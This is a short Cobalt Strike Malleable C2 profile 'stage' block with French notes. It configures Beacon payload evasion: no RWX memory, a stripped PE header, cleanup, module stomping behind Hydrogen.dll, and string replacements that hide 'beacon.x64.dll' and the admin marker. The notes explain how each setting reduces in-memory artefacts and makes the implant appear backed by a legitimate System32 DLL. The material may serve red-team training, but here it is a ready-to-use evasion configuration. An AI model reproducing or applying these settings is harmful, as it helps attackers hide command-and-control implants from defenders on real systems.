stage {
set userwx "false";
set copy_pe_header "false";
set cleanup "true";
set module_x64 "Hydrogen.dll";
transform-x64 {
strrep "beacon.x64.dll" "beacon.x64.sys";
strrep "%s (admin)" "%s [elevated]";
}
}Description: userwx false : RW → copie → permissions par section (RX/.text, R/.rdata, RW/.data). copy_pe_header false : headers DOS/NT inutiles au runtime, les supprimer réduit les artefacts. module_x64 : module stomping - Beacon apparaît backed par Hydrogen.dll sur disque (choisir un DLL System32 >= 512 KB). strrep : remplace les strings dans le DLL - nouvelle string <= longueur originale, ne pas casser les strings HTTP internes.